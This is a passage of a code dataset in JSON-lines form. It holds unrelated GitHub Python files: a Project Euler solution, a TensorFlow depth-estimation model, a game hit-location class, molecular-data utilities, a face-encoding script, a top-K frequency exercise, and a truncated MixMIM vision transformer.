Dec 2000)?\n\n\ndef reset_week(days):\n days = 0 if days > 5 else days + 1\n return days\n\ndef get_days_count_in_month(year, month):\n if month == 1:\n if not (year + 1900) % 4:\n if not (year + 1900) % 100 and (year + 1900) % 400:\n return 28\n else:\n return 29\n else:\n return 28\n if month in (3, 5, 8, 10):\n return 30\n return 31\n \ndef get_sundays():\n years = 30\n months = 0\n days = 0\n day_of_week = 1\n sundays_count = 0\n for years in range(0, 101):\n for months in range(12):\n for days in range(get_days_count_in_month(years, months)):\n if days == 0 and day_of_week == 0 and years > 0:\n sundays_count += 1\n day_of_week = reset_week(day_of_week)\n days = 0\n months = 0\n return sundays_count\n\nprint(get_sundays())\n","repo_name":"armou/euler-project","sub_path":"problem19/problem19.py","file_name":"problem19.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"33689580288","text":"'''\nMODEL :: Tensorflow Computer Vision Platform\nDATE :: 2020-01-24\nFILE :: model.py \n'''\n\nfrom __future__ import absolute_import, division, print_function\n\nimport numpy as np\nimport tensorflow as tf\n\n# import mde engine \nfrom engine.mde.img_proc import ImgProc\nfrom engine.mde.mde_proc import MdeProc\nfrom engine.mde.mde_postproc import MdePostproc\nfrom engine.mde.mde_loss import MdeLoss\n\n# import utils \nfrom utils.bilinear_sampler import *\n\n# import nn kits\nfrom nn.nn_kits import NnKits\nfrom nn.unet import UNet\nfrom nn.vgg import Vgg\nfrom nn.resnet import Resnet\nfrom nn.resnet18 import Resnet18\nfrom nn.resvgg import Resvgg\nfrom nn.resASPP import ResASPP\n\n\nclass MonodepthModel(object):\n \"\"\"monodepth model\"\"\"\n\n def __init__(self, 
params, mode, left, right, reuse_variables=None, model_index=0): \n self.params = params\n self.mode = mode\n self.left = left\n self.right = right\n\n self.model_collection = ['model_' + str(model_index)]\n\n self.reuse_variables = reuse_variables\n\n # init toolkits \n self.nn = NnKits()\n self.imgproc = ImgProc()\n self.mdeproc = MdeProc(self.left)\n self.mde_loss = MdeLoss()\n\n # init codec\n self.encoder(self.params.encoder)\n self.decoder()\n\n # init postproc\n if not self.mode == 'train':\n self.postproc = MdePostproc(self.left)\n\n # run model/output\n self.build_model()\n self.build_outputs()\n\n if not self.mode == 'train':\n return\n\n # run loss\n self.build_losses()\n\n # Model Encoder and Decoder\n def encoder(self, encoder_type='vgg'):\n self.stages = 4 \n if encoder_type == 'vgg':\n self.enc = Vgg()\n self.stages = 6 \n elif encoder_type == 'resnet':\n self.enc = Resnet()\n self.stages = 5 \n elif encoder_type == 'resvgg':\n self.enc = Resvgg()\n self.stages = 5\n elif encoder_type == 'resASPP':\n self.enc = ResASPP() \n elif encoder_type == 'resnet18':\n self.enc = Resnet18() \n else:\n print('>>>{} encoder is not supported. <<<'.format(encoder_type))\n exit()\n\n def decoder(self): \n self.dec = UNet(self.stages) \n\n def build_model(self):\n with tf.compat.v1.variable_scope('build_model'):\n with tf.compat.v1.variable_scope('model', reuse=self.reuse_variables):\n\n self.left_pyramid = self.imgproc.scale_pyramid(self.left, 4) \n if self.mode == 'train':\n self.right_pyramid = self.imgproc.scale_pyramid(self.right, 4)\n\n if self.params.do_stereo:\n self.model_input = tf.concat([self.left, self.right], 3)\n else:\n self.model_input = self.left\n\n #build model\n self.enc.forward(self.model_input)\n self.dec.forward(self.enc) \n\n def build_outputs(self):\n self.disp1, self.disp2, self.disp3, self.disp4 = self.dec.disp1, \\\n self.dec.disp2, \\\n self.dec.disp3, \\\n self.dec.disp4\n # STORE DISPARITIES\n with tf.compat.v1.variable_scope('disparities'):\n self.disp_est = [self.disp1, self.disp2, self.disp3, self.disp4]\n self.disp_left_est = [tf.expand_dims(d[:,:,:,0], 3) for d in self.disp_est]\n self.disp_right_est = [tf.expand_dims(d[:,:,:,1], 3) for d in self.disp_est]\n\n if not self.mode == 'train':\n self.disp_est = self.disp1[0,:,:,0]\n self.disp_est_right = self.disp1[0,:,:,1] \n self.disp_est_pp = self.postproc.post_process(self.disp1)\n self.disp_est_ppp = self.postproc.post_process_plus(self.disp1)\n return\n\n # GENERATE IMAGES\n with tf.compat.v1.variable_scope('images'):\n self.left_est = [self.mdeproc.generate_image_left(self.right_pyramid[i], self.disp_left_est[i]) for i in range(4)]\n self.right_est = [self.mdeproc.generate_image_right(self.left_pyramid[i], self.disp_right_est[i]) for i in range(4)]\n\n # LR CONSISTENCY\n with tf.compat.v1.variable_scope('left-right'):\n self.right_to_left_disp = [self.mdeproc.generate_image_left(self.disp_right_est[i], self.disp_left_est[i]) for i in range(4)]\n self.left_to_right_disp = [self.mdeproc.generate_image_right(self.disp_left_est[i], self.disp_right_est[i]) for i in range(4)]\n\n # DISPARITY SMOOTHNESS\n with tf.compat.v1.variable_scope('smoothness'):\n self.disp_left_smoothness = self.mdeproc.get_disparity_smoothness(self.disp_left_est, self.left_pyramid)\n self.disp_right_smoothness = self.mdeproc.get_disparity_smoothness(self.disp_right_est, self.right_pyramid)\n\n\n def build_losses(self):\n with tf.compat.v1.variable_scope('losses', reuse=self.reuse_variables):\n self.mde_loss.init_model_output(self)\n\n 
self.image_loss = self.mde_loss.get_image_loss()\n self.lr_loss = self.mde_loss.get_lr_losss()\n self.disp_loss = self.mde_loss.get_dist_loss()\n\n # TOTAL LOSS\n self.total_loss = self.image_loss + \\\n self.params.lr_loss_weight * self.lr_loss + \\\n self.params.disp_gradient_loss_weight * self.disp_loss \n\n return self.total_loss\n\n\n","repo_name":"kspeng/dev-monodepth-tensorflow-v2.x","sub_path":"engine/mde/mde_model.py","file_name":"mde_model.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"21179716333","text":"class HitLocation:\n def __init__(self, lowerBound, upperBound, name):\n self.lowerBound = lowerBound\n self.upperBound = upperBound\n self.name = name\n self.conditions = []\n def addCondition(self, condition, duration):\n self.conditions.append([condition, duration])\n def decrementConditions(self):\n outStr = ''\n for a in self.conditions:\n if a[1] > 0:\n a[1] = a[1] - 1\n outStr = outStr + self.name + ' is now ' + a[0] + ' for ' + str(a[1]) + ' intervals.\\n'\n return outStr.rstrip('\\n')\n def cleanupConditions(self):\n tempList = self.conditions.copy()\n self.conditions.clear()\n condLength = len(tempList)\n cleanedConditions = []\n while condLength > 0:\n c = tempList.pop(0)\n if c[1] != 0:\n self.conditions.append(c)\n else:\n cleanedConditions.append(c[0])\n condLength = condLength - 1\n return cleanedConditions\n def endCondition(self, condName):\n tempList = self.conditions.copy()\n self.conditions.clear()\n condLength = len(tempList)\n cleanedConditions = []\n while condLength > 0:\n c = tempList.pop(0)\n if c[0] != condName:\n self.conditions.append(c)\n else:\n cleanedConditions.append(c[0])\n condLength = condLength - 1\n return cleanedConditions\n def replaceCondition(self, conditionToRemove, conditionToAdd, duration):\n outStr = ''\n tempList = self.conditions.copy()\n self.conditions.clear()\n condLength = len(tempList)\n while condLength > 0:\n c = tempList.pop(0)\n if c[0] != conditionToRemove:\n self.conditions.append(c)\n else:\n outStr = outStr + self.name + ' is no longer ' + c[0]\n self.conditions.append([conditionToAdd, duration])\n condLength = condLength - 1\n if outStr != '':\n return outStr + ' but is now ' + conditionToAdd + ' for ' + str(duration)\n else: return 'Replacement failed, could not find ' + conditionToRemove\n def readConditions(self):\n outStr = ''\n for c in self.conditions:\n if c[1] < 0:\n outStr = outStr + self.name + ' is ' + c[0] + ' until further notice.\\n' \n else:\n outStr = outStr + self.name + ' is ' + c[0] + ' for ' + str(c[1]) + ' intervals.\\n'\n if outStr == '':\n return self.name + ' has no conditions.\\n'\n else:\n return outStr\n","repo_name":"SpessMahrine/AdEva3CombAsst","sub_path":"HitLocation.py","file_name":"HitLocation.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11481244256","text":"from util import*\n\nimport numpy as np\nfrom scipy.spatial.distance import pdist\n\ndef toDistance(R):\n '''\n This function takes a numpy array containing positions and returns it as distances.\n \n Parameters:\n -R:\n numpy array containing positions for every atom in every sample\n Dimensions: (n_samples,n_atoms,n_dimensions)\n \n Returns:\n -y:\n numpy array containing distances for every atom in every sample\n Dimensions: (n_samples,n_atoms*(n_atoms-1)/2)\n '''\n \n shape=R.shape\n try:\n dim=shape[2]\n 
except:\n print(\"toDistance: wrong dimensions\")\n return\n if shape[1]<2:\n print(\"not enough atoms\")\n return\n\n y=[]\n\n for i in range(len(R)): ##goes through samples\n y.append(pdist(R[i]))\n\n y=np.array(y)\n return y\n\ndef r_to_desc(self):\n '''\n Returns the position array as an array of desired description.\n This description is solely used for clusterisation.\n Default is inverse distances.\n \n Parameters:\n -R:\n numpy array containing positions for every atom in every sample\n Dimensions: (n_samples,n_atoms,n_dimensions)\n \n Returns:\n numpy array containing inverse distances for every atom in every sample\n Dimensions: (n:samples,n_atoms*(n_atoms-1)/2)\n '''\n dataset=self.dataset\n R=dataset['R']\n return 1. / toDistance(R)\n\ndef extract_E(self):\n dataset=self.dataset\n E=dataset['E']\n return np.array(E)\n\ndef extract_R_concat(self):\n dataset=self.dataset\n R=dataset['R']\n n_samples,n_atoms,n_dim=R.shape\n R=np.reshape(R,(n_samples,n_atoms*n_dim))\n return np.array(R)\n\ndef extract_F_concat(self):\n dataset=self.dataset\n F=dataset['F']\n n_samples,n_atoms,n_dim=F.shape\n F=np.reshape(F,(n_samples,n_atoms*n_dim))\n return np.array(F)\n\ndef mean_squared_error_sample_wise(x,y):\n err=(np.array(x)-np.array(y))**2\n return err.mean(axis=1)\n\ndef lowest_variance_ind(a):\n var_sum=[]\n for s in a:\n b=a-s\n var_sum.append(np.sum(np.square(b)))\n return np.argmin(var_sum)\n\ndef within_cluster_lowest_variance(db,cl_ind,err):\n new_ind=[]\n var=db.vars[db.para['generate_training_data']['var_index']]\n for ind in cl_ind:\n R=var[ind]\n lv_ind=lowest_variance_ind(R)\n new_ind.append(ind[lv_ind])\n\n return new_ind\n\ndef within_cluster_highest_error(db,cl_ind,err):\n new_ind=[]\n for ind in cl_ind:\n cl_err=err[ind]\n argmax=np.argmax(cl_err)\n new_ind.append(ind[argmax])\n\n return new_ind\n\ndef within_high_error_cluster_lowest_variance(db,cl_ind,err):\n new_ind=[]\n var=db.vars[db.para['generate_training_data']['var_index']]\n N=db.para['generate_training_data']['n_he_clusters']\n\n #find highest error clusters\n mse=[np.mean(err[x]) for x in cl_ind]\n argsort=np.argsort(mse)\n new_cl_ind=np.array(cl_ind)[argsort[-N:]]\n\n for ind in new_cl_ind:\n R=var[ind]\n lv_ind=lowest_variance_ind(R)\n new_ind.append(ind[lv_ind])\n\n return new_ind\n\ndef weighted_distribution(N,weights):\n weights=np.array(weights)/np.sum(weights)\n a=(weights*N)\n b=a.astype(int)\n c=a-b\n s=np.sum(b)\n\n for i in range(N-s):\n arg=np.argmax(c)\n c[arg]=0\n b[arg]=b[arg]+1\n\n return b\n\ndef db_indices(self):\n return np.arange(len(self.dataset))\n\ndef within_cluster_weighted_err_N(db,cl_ind,err):\n new_ind=[]\n N=db.para['generate_training_data']['n_points']\n\n #find cluster errors and pops\n mse=np.array([np.mean(err[x]) for x in cl_ind])\n pop=np.array([len(x) for x in cl_ind])\n\n weights=(mse/np.sum(mse))*(pop/np.sum(pop))\n Ns=weighted_distribution(N,weights)\n\n for i in range(len(cl_ind)):\n ind=np.array(cl_ind[i])\n cl_err=err[ind]\n ni=Ns[i]\n argmax=np.argsort(-cl_err)[:ni]\n new_ind.extend(ind[argmax])\n\n return new_ind\n\ndef MD17_extract_E(self):\n\n if getattr(self,'dataset_npz',None) is None:\n dataset=self.dataset\n E=[]\n l=len(dataset) \n for i in range(l):\n E.append(dataset[i]['energy'].numpy())\n print(f\"Exctracting db energies: {i/l*100:.0f}%\",end='\\r')\n\n print(\"\")\n else:\n E=np.reshape(self.dataset_npz['E'],(len(self.dataset_npz['E']),-1))\n return np.array(E)\n\ndef MD17_extract_F(self):\n if getattr(self,'dataset_npz',None) is None:\n 
dataset=self.dataset\n F=[]\n l=len(dataset) \n for i in range(l):\n F.append(dataset[i]['forces'].numpy())\n print(f\"Exctracting db forces: {i/l*100:.0f}%\",end='\\r')\n\n print(\"\")\n else:\n F=self.dataset_npz['F']\n return np.array(F).reshape(len(F),-1)\n\ndef MD17_R_to_dist(self):\n if getattr(self,'dataset_npz',None) is None:\n dataset=self.dataset\n R=[]\n l=len(dataset) \n for i in range(l):\n R.append(dataset[i]['_positions'].numpy())\n print(f\"Exctracting db positions: {i/l*100:.0f}%\",end='\\r')\n\n print(\"\")\n else:\n R=self.dataset_npz['R']\n R=toDistance(np.array(R))\n return R\n\ndef load_npz_file(self,path,*args):\n self.dataset=np.load(path)\n\ndef load_MD17_file_molecule(self,path,molecule=None,npz_data=None):\n if molecule is None:\n print_warning(\"No molecule selected for MD17 model (no second arg given). Entire dataset taken.\")\n from schnetpack.datasets import MD17\n data=MD17(path,molecule=molecule)\n\n if npz_data is not None:\n self.dataset_npz=np.load(npz_data)\n else:\n self.dataset_npz=None\n\n self.dataset=data\n\ndef get_info_split_train_indices(db,model_path,data_path):\n path='Info/split.npz'\n split=np.load(path)\n return split['train_idx']\n\ndef get_info_split_train_indices_preload(db,data_path):\n split=np.load(data_path)\n return split['train_idx']\n\ndef get_info_savep_train_indices_preload(db,data_path):\n with open(data_path,'rb') as file:\n save=pickle.loads(file.read())\n return save['training_indices']\n\ndef save_split_MD17(db,ind,name):\n dataset=db.dataset\n para=db.para['generate_training_data']\n ind_rest= np.delete(np.arange(len(dataset)),ind)\n val=np.random.choice(ind_rest,para['n_val'],replace=False)\n test=np.delete(ind_rest,val)\n\n path=os.path.join(db.info_path,'split.npz')\n np.savez(path,train_idx=ind,val_idx=val,test_idx=test)\n db.step_dataset_path=path\n\ndef sgdml_dataset_fix_path(db):\n full_path = os.path.dirname(os.path.realpath(__file__))\n data_path=db.args['dataset_path']\n\n dataset=dict(np.load(data_path))\n dataset['name']=os.path.join(full_path,data_path)\n np.savez_compressed(data_path,**dataset)\n\n\n\n","repo_name":"monopsony/Improved-Learning","sub_path":"descri.py","file_name":"descri.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19286437838","text":"#!/usr/bin/python3\nimport face_recognition\nimport json\n\nbase_path = \"../faces/face\"\n\npeople = [\n (\"1\", \"Gargamel\"),\n (\"2\", \"Marija\"),\n (\"3\", \"Ana\"),\n (\"4\", \"Maja\"),\n (\"5\", \"Irena\"),\n (\"6\", \"Mojca\"),\n (\"7\", \"Nina\"),\n (\"8\", \"Mateja\"),\n (\"9\", \"Natasa\"),\n (\"10\", \"Andreja\"),\n]\n\nout = []\n\nfor (path, name) in people:\n image = face_recognition.load_image_file(base_path + path + \".png\")\n\n boxes = face_recognition.face_locations(image)\n\n encoding = face_recognition.face_encodings(\n image, boxes, num_jitters=5, model=\"large\"\n )\n \n out.append({\"name\": name, \"encoding\": encoding[0].tolist()})\n\nwith open(\"../data/encoding_data.json\", \"w\") as outfile:\n json.dump(out, outfile)\n","repo_name":"mokot/development-of-intelligent-systems","sub_path":"task1/helper/face_encodings.py","file_name":"face_encodings.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73018852321","text":"'''\nGiven a non-empty array of integers, find the top K elements which have the\nhighest frequency in the 
array. If two numbers have the same frequency then\nthe larger number should be given preference.\n\nExample 1:\n\nInput:\nN = 6\nA[] = {1,1,1,2,2,3}\nK = 2\nOutput: 1 2\nExample 2:\n\nInput:\nN = 8\nA[] = {1,1,2,2,3,3,3,4}\nK = 2\nOutput: 3 2\nExplanation: Elements 1 and 2 have the\nsame frequency ie. 2. Therefore, in this\ncase, the answer includes the element 2\nas 2 > 1.\nUser Task:\nThe task is to complete the function TopK() that takes the array and integer K\nas input and returns a list of top K frequent elements.\n\nExpected Time Complexity : O(NlogN)\nExpected Auxilliary Space : O(N)\n\nConstraints:\n1 <= N <= 103\n1<=A[i]<=104\n\n'''\n\n\ndef TopK(arr, n, k):\n # freq count\n mp = dict()\n for ele in arr:\n if ele in mp:\n mp[ele] = mp.get(ele) + 1\n else:\n mp[ele] = 1\n print(\"arr:\", arr)\n print(\"mp:\", mp)\n\n # sort dict by freq values\n # and then for each freq. values as key sorted descending order.\n mp_val = dict()\n for key, val in mp.items():\n if val in mp_val:\n mp_val.get(val).append(key)\n else:\n mp_val[val] = [key]\n print(\"mp_val:\", mp_val)\n sorted_mp_val = sorted(mp_val.items(), key=lambda x: (x[0], x[1]), reverse=True)\n print(\"sorted_mp_val:\", sorted_mp_val)\n cnt = 0\n for i in range(len(sorted_mp_val)):\n for j in range(len(sorted_mp_val[i][1])):\n print(sorted_mp_val[i][1][j], end=\" \")\n if k == cnt:\n break\n cnt += 1\n\n\nif __name__ == '__main__':\n # Output: 5,4 2\n arr = [4, 5, 5, 6, 4]\n print(arr, TopK(arr, 5, 2))\n\n '''\n\n # Output: 1 2\n arr = [1, 1, 1, 2, 2, 3]\n print(arr, TopK(arr, 6, 2))\n\n arr = [1, 1, 2, 2, 3, 3, 3, 4]\n TopK(arr, 8, 2)\n '''\n","repo_name":"ferryleaf/GitPythonPrgms","sub_path":"hashing/top_K_Frequent_Elements_in_Array.py","file_name":"top_K_Frequent_Elements_in_Array.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74228820322","text":"class color:\n import os\n T = os.getenv('TERM')\n if ( T=='cygwin' or T=='mingw' ) :\n HEADER = '\\033[01;35m'\n BLUE = '\\033[01;34m'\n GREEN = '\\033[01;32m'\n WARNING = '\\033[01;33m'\n FAIL = '\\033[01;31m'\n RED = FAIL\n ENDC = '\\033[0m'\n else :\n HEADER = '\\033[95m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n RED = FAIL\n ENDC = '\\033[0m'\n\n def disable(self):\n self.HEADER = ''\n self.OKBLUE = ''\n self.OKGREEN = ''\n self.WARNING = ''\n self.FAIL = ''\n self.RED = ''\n self.ENDC = ''\n","repo_name":"pyscf/nao","sub_path":"pyscf/nao/m_color.py","file_name":"m_color.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"27385600130","text":"import random\nimport math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom util.pos_embed import get_2d_sincos_pos_embed\n\nfrom timm.models.layers import trunc_normal_, to_2tuple\nfrom timm.models.swin_transformer import PatchMerging\nfrom timm.models.swin_transformer import window_partition, window_reverse\nfrom timm.models.vision_transformer import PatchEmbed, Block, Mlp, DropPath\nfrom timm.models.registry import register_model\nfrom torch.utils.checkpoint import checkpoint\n\n\nclass WindowAttention(nn.Module):\n\n def __init__(self, dim, window_size, num_heads, qkv_bias=True, attn_drop=0., proj_drop=0.):\n\n super().__init__()\n self.dim = dim\n self.window_size = window_size # Wh, Ww\n self.num_heads = num_heads\n head_dim = dim // num_heads\n 
self.scale = head_dim ** -0.5\n\n # define a parameter table of relative position bias\n self.relative_position_bias_table = nn.Parameter(\n torch.zeros((2 * window_size[0] - 1) * (2 * window_size[1] - 1), num_heads)) # 2*Wh-1 * 2*Ww-1, nH\n\n # get pair-wise relative position index for each token inside the window\n coords_h = torch.arange(self.window_size[0])\n coords_w = torch.arange(self.window_size[1])\n coords = torch.stack(torch.meshgrid([coords_h, coords_w])) # 2, Wh, Ww\n coords_flatten = torch.flatten(coords, 1) # 2, Wh*Ww\n relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :] # 2, Wh*Ww, Wh*Ww\n relative_coords = relative_coords.permute(1, 2, 0).contiguous() # Wh*Ww, Wh*Ww, 2\n relative_coords[:, :, 0] += self.window_size[0] - 1 # shift to start from 0\n relative_coords[:, :, 1] += self.window_size[1] - 1\n relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1\n relative_position_index = relative_coords.sum(-1) # Wh*Ww, Wh*Ww\n self.register_buffer(\"relative_position_index\", relative_position_index)\n\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n\n trunc_normal_(self.relative_position_bias_table, std=.02)\n self.softmax = nn.Softmax(dim=-1)\n\n def forward(self, x, mask = None):\n B_, N, C = x.shape\n qkv = self.qkv(x).reshape(B_, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n q, k, v = qkv.unbind(0) # make torchscript happy (cannot use tensor as tuple)\n\n q = q * self.scale\n attn = (q @ k.transpose(-2, -1))\n\n relative_position_bias = self.relative_position_bias_table[self.relative_position_index.view(-1)].view(\n self.window_size[0] * self.window_size[1], self.window_size[0] * self.window_size[1], -1) # Wh*Ww,Wh*Ww,nH\n relative_position_bias = relative_position_bias.permute(2, 0, 1).contiguous() # nH, Wh*Ww, Wh*Ww\n attn = attn + relative_position_bias.unsqueeze(0)\n\n if mask is not None:\n mask = mask.reshape(B_, 1, 1, N)\n mask_new = mask * mask.transpose(2, 3) + (1 - mask) * (1 - mask).transpose(2, 3)\n mask_new = 1 - mask_new\n if mask_new.dtype == torch.float16:\n attn = attn - 65500 * mask_new\n else:\n attn = attn - 1e30 * mask_new\n attn = self.softmax(attn)\n attn = self.attn_drop(attn)\n\n x = (attn @ v).transpose(1, 2).reshape(B_, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\nclass MixMIMBlock(nn.Module):\n\n def __init__(self, dim, input_resolution, num_heads, window_size=7,\n mlp_ratio=4., qkv_bias=True, drop=0., attn_drop=0., drop_path=0.,\n act_layer=nn.GELU, norm_layer=nn.LayerNorm):\n super().__init__()\n self.dim = dim\n self.input_resolution = input_resolution\n self.num_heads = num_heads\n self.window_size = window_size\n self.mlp_ratio = mlp_ratio\n if min(self.input_resolution) <= self.window_size:\n # if window size is larger than input resolution, we don't partition windows\n self.window_size = min(self.input_resolution)\n\n self.norm1 = norm_layer(dim)\n self.attn = WindowAttention(\n dim, window_size=to_2tuple(self.window_size), num_heads=num_heads, qkv_bias=qkv_bias,\n attn_drop=attn_drop, proj_drop=drop)\n\n self.drop_path = DropPath(drop_path) if drop_path > 0. 
else nn.Identity()\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)\n\n def forward(self, x, attn_mask=None):\n H, W = self.input_resolution\n B, L, C = x.shape\n\n shortcut = x\n x = self.norm1(x)\n x = x.view(B, H, W, C)\n\n # partition windows\n x_windows = window_partition(x, self.window_size) # nW*B, window_size, window_size, C\n x_windows = x_windows.view(-1, self.window_size * self.window_size, C) # nW*B, window_size*window_size, C\n if attn_mask is not None:\n attn_mask = attn_mask.repeat(B, 1, 1) # B, N, 1\n attn_mask = attn_mask.view(B, H, W, 1)\n attn_mask = window_partition(attn_mask, self.window_size)\n attn_mask = attn_mask.view(-1, self.window_size * self.window_size, 1)\n\n # W-MSA/SW-MSA\n attn_windows = self.attn(x_windows, mask=attn_mask) # nW*B, window_size*window_size, C\n\n # merge windows\n attn_windows = attn_windows.view(-1, self.window_size, self.window_size, C)\n x = window_reverse(attn_windows, self.window_size, H, W) # B H' W' C\n\n x = x.view(B, H * W, C)\n\n x = shortcut + self.drop_path(x)\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n\n return x\n\n\nclass MixMIMLayer(nn.Module):\n\n def __init__(self, dim, input_resolution, depth, num_heads, window_size,\n mlp_ratio=4., qkv_bias=True, drop=0., attn_drop=0.,\n drop_path=0., norm_layer=nn.LayerNorm, downsample=None, \n use_checkpoint=False):\n\n super().__init__()\n self.dim = dim\n self.input_resolution = input_resolution\n self.depth = depth\n self.use_checkpoint = use_checkpoint\n\n # build blocks\n self.blocks = nn.ModuleList()\n for i in range(depth):\n self.blocks.append(\n MixMIMBlock(\n dim=dim, input_resolution=input_resolution, num_heads=num_heads, \n window_size=window_size, mlp_ratio=mlp_ratio,\n qkv_bias=qkv_bias, drop=drop, attn_drop=attn_drop,\n drop_path=drop_path[i] if isinstance(drop_path, list) else drop_path, \n norm_layer=norm_layer)\n )\n # patch merging layer\n if downsample is not None:\n self.downsample = downsample(input_resolution, dim=dim, norm_layer=norm_layer)\n else:\n self.downsample = None\n\n def forward(self, x, attn_mask=None):\n for blk in self.blocks:\n if self.use_checkpoint:\n x = checkpoint(blk, x, attn_mask)\n else:\n x = blk(x, attn_mask=attn_mask)\n if self.downsample is not None:\n x = self.downsample(x)\n return x\n\n def extra_repr(self) -> str:\n return f\"dim={self.dim}, input_resolution={self.input_resolution}, depth={self.depth}\"\n\n\nclass MixMIM(nn.Module):\n def __init__(self, decoder_dim=512, decoder_depth=8, decoder_num_heads=16, \n mlp_ratio=4, norm_pix_loss=True, \n img_size=224, patch_size=4, in_chans=3, num_classes=0,\n embed_dim=96, depths=[2, 2, 18, 2], num_heads=[3, 6, 12, 24],\n window_size=[7, 7, 14, 7], qkv_bias=True, qk_scale=None, patch_norm=True,\n drop_rate=0.0, drop_path_rate=0.0, attn_drop_rate=0.0, \n norm_layer=nn.LayerNorm, use_checkpoint=False, range_mask_ratio=0.0, **kwargs):\n super().__init__()\n # decoder args\n self.decoder_dim = decoder_dim\n self.decoder_depth = decoder_depth\n self.decoder_num_heads = decoder_num_heads\n\n # encoder args\n self.encoder_stride = 32\n self.embed_dim = embed_dim\n self.patch_norm = patch_norm\n self.depths = depths\n self.num_layers = len(depths)\n self.num_heads = num_heads\n self.qkv_bias = qkv_bias\n self.drop_rate = drop_rate\n self.attn_drop_rate = attn_drop_rate\n self.use_checkpoint = use_checkpoint\n self.img_size = img_size\n self.mlp_ratio = mlp_ratio\n 
self.window_size = window_size\n self.num_features = int(embed_dim * 2 ** (self.num_layers - 1))\n\n # reconstruction args\n self.norm_pix_loss = norm_pix_loss\n self.range_mask_ratio = range_mask_ratio\n\n # split image into non-overlapping patches\n self.patch_embed = PatchEmbed(\n img_size=img_size, patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim,\n norm_layer=norm_layer if self.patch_norm else None)\n num_patches = self.patch_embed.num_patches\n self.patch_grid = self.patch_embed.grid_size\n\n self.dpr = [x.item() for x in torch.linspace(0, drop_path_rate, sum(depths))] # stochastic depth decay rule\n\n # build layers\n self.layers = nn.ModuleList()\n for i_layer in range(self.num_layers):\n self.layers.append(MixMIMLayer(\n dim=int(self.embed_dim * 2 ** i_layer),\n input_resolution=(self.patch_grid[0] // (2 ** i_layer), self.patch_grid[1] // (2 ** i_layer)),\n depth=self.depths[i_layer],\n num_heads=self.num_heads[i_layer],\n window_size=self.window_size[i_layer],\n mlp_ratio=self.mlp_ratio,\n qkv_bias=self.qkv_bias,\n drop=self.drop_rate,\n attn_drop=self.attn_drop_rate,\n drop_path=self.dpr[sum(self.depths[:i_layer]):sum(self.depths[:i_layer + 1])],\n norm_layer=norm_layer,\n downsample=PatchMerging if (i_layer < self.num_layers - 1) else None,\n use_checkpoint=self.use_checkpoint)\n )\n self.pos_drop = nn.Dropout(p=drop_rate)\n self.norm = norm_layer(self.num_features)\n\n self.mask_token = nn.Parameter(torch.zeros(1, 1, self.decoder_dim))\n trunc_normal_(self.mask_token, mean=0., std=.02)\n\n num_patches = self.patch_embed.num_patches\n out_num_patches = (self.img_size // self.encoder_stride) ** 2\n self.out_num_patches = out_num_patches\n self.absolute_pos_embed = nn.Parameter(torch.zeros(1, num_patches, self.embed_dim), requires_grad=False)\n self.decoder_pos_embed = nn.Parameter(torch.zeros(1, out_num_patches, decoder_dim), requires_grad=False)\n\n self.decoder_embed = nn.Linear(self.num_features, decoder_dim)\n self.decoder_blocks = nn.ModuleList([\n Block(decoder_dim, decoder_num_heads, mlp_ratio, qkv_bias=True, norm_layer=norm_layer)\n for i in range(decoder_depth)])\n\n self.decoder_norm = norm_layer(decoder_dim)\n self.decoder_pred = nn.Linear(\n decoder_dim,\n self.encoder_stride ** 2 * 3\n )\n\n self.initialize_weights()\n\n def initialize_weights(self):\n # initialization\n # initialize (and freeze) pos_embed by sin-cos embedding\n pos_embed = get_2d_sincos_pos_embed(self.absolute_pos_embed.shape[-1], \\\n int(self.patch_embed.num_patches**.5), cls_token=False)\n self.absolute_pos_embed.data.copy_(torch.from_numpy(pos_embed).float().unsqueeze(0))\n\n decoder_pos_embed = get_2d_sincos_pos_embed(self.decoder_pos_embed.shape[-1], \\\n int(self.out_num_patches**.5), cls_token=False)\n self.decoder_pos_embed.data.copy_(torch.from_numpy(decoder_pos_embed).float().unsqueeze(0))\n\n # initialize nn.Linear and nn.LayerNorm\n self.apply(self._init_weights)\n\n def _init_weights(self, m):\n if isinstance(m, nn.Linear):\n # we use xavier_uniform following official JAX ViT:\n torch.nn.init.xavier_uniform_(m.weight)\n if isinstance(m, nn.Linear) and m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.LayerNorm):\n nn.init.constant_(m.bias, 0)\n nn.init.constant_(m.weight, 1.0)\n\n def random_masking(self, x, mask_ratio):\n B, C, H, W = x.shape\n out_H = H // self.encoder_stride\n out_W = W // self.encoder_stride\n s3_H, s3_W = out_H * 2, out_W * 2\n s2_H, s2_W = out_H * 4, out_W * 4\n s1_H, s1_W = out_H * 8, out_W * 